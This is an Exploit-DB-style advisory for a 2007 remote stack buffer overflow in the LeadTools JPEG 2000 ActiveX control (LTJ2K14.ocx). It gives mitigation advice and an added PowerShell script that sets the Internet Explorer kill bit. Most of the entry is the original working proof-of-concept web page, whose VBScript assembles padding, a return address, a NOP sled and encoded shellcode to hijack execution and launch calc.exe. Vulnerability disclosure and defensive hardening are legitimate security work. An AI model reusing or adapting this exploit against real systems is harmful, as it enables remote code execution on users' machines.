Vendor: LeadTools JPEG 2000 COM Object
By: shinnai
CVSS: 7.5 (HIGH)
CWE: 121 (Remote Stack-Based Buffer Overflow)
Product Name: LeadTools JPEG 2000 COM Object
Affected Version From: 14.5.0.35
Affected Version To: 14.5.0.35
Patch Exists: NO
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
Year: 2007

LeadTools JPEG 2000 COM Object (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow

This exploit overflows a stack buffer in the LeadTools JPEG 2000 COM Object (LTJ2K14.ocx) component by assigning an overlong string to the control's BitmapDataPath property from a web page, leading to remote code execution. As a proof of concept, the exploit opens the calculator (calc.exe).

Mitigation:

Apply the latest patches and updates for the LeadTools JPEG 2000 COM Object (LTJ2K14.ocx) component. Restrict access to the vulnerable component if possible. Use an alternative component if available.
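
One concrete way to restrict access to the control is to set the Internet Explorer ActiveX kill bit for its CLSID. The PowerShell below is an added example, not part of the original advisory: the CLSID is taken from the PoC's `<object>` tag, the helper name `Set-ActiveXKillBit` is hypothetical, and an elevated session is assumed.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original advisory): set the IE ActiveX kill bit
# for the LTJ2K14.ocx control. CLSID taken from the PoC's <object> tag.
$Clsid   = '{00140020-B1BA-11CE-ABC6-F5B2E79D9E3F}'
$KillBit = 0x00000400   # "Compatibility Flags" bit that stops IE loading the control
$Name    = 'Compatibility Flags'

# Native registry view, plus the 32-bit view that 32-bit IE reads on 64-bit Windows.
$IeRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer'
)

# Set-ActiveXKillBit is a hypothetical helper name used only in this example.
function Set-ActiveXKillBit {
    param(
        [Parameter(Mandatory)][string]$IeRoot,
        [Parameter(Mandatory)][string]$Clsid
    )
    $key = Join-Path $IeRoot "ActiveX Compatibility\$Clsid"
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }
    # Keep any flags that are already set and OR in the kill bit.
    $before = (Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue).$Name
    if ($null -eq $before) { $before = 0 }
    $after = $before -bor $KillBit
    New-ItemProperty -Path $key -Name $Name -PropertyType DWord -Value $after -Force | Out-Null

    # Read the value back so the report reflects what is actually stored.
    $stored = (Get-ItemProperty -LiteralPath $key -Name $Name).$Name
    [pscustomobject]@{
        Key     = $key
        Before  = '0x{0:X8}' -f $before
        After   = '0x{0:X8}' -f $stored
        Blocked = [bool]($stored -band $KillBit)
    }
}

foreach ($root in $IeRoots) {
    # Skip views that do not exist (for example Wow6432Node on 32-bit Windows).
    if (Test-Path -LiteralPath $root) {
        Set-ActiveXKillBit -IeRoot $root -Clsid $Clsid
    }
}
```

The kill bit only stops Internet Explorer and other hosts that honor it from instantiating the control; applications that load LTJ2K14.ocx directly are unaffected.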
Source

Exploit-DB raw data:

 <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/18</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------
 <b>LeadTools JPEG 2000 COM Object (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow</b>
 url: http://www.leadtools.com/
 price: eheheh, take a look at their site :)
 
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 fully patched with Internet Explorer 7

 <font color = red><b>This exploit just opens calc.exe</b></font>
-----------------------------------------------------------------------------------------------

<object classid='clsid:00140020-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language = 'vbscript'>
 Sub tryMe()
  buff      = String(396, "A")

  get_EIP   = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)

  nop       = String(16, unescape("%90"))

  shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
              unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
              unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
              unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
              unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
              unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
              unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
              unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
              unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
              unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
              unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
              unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
              unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
              unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
              unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
              unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
              unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
              unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
              unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
              unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
              unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")

  egg       = buff + get_EIP + nop + shellcode + nop

  test.BitmapDataPath = egg
 End Sub

</script>
</span>
</code></pre>

# milw0rm.com [2007-05-18]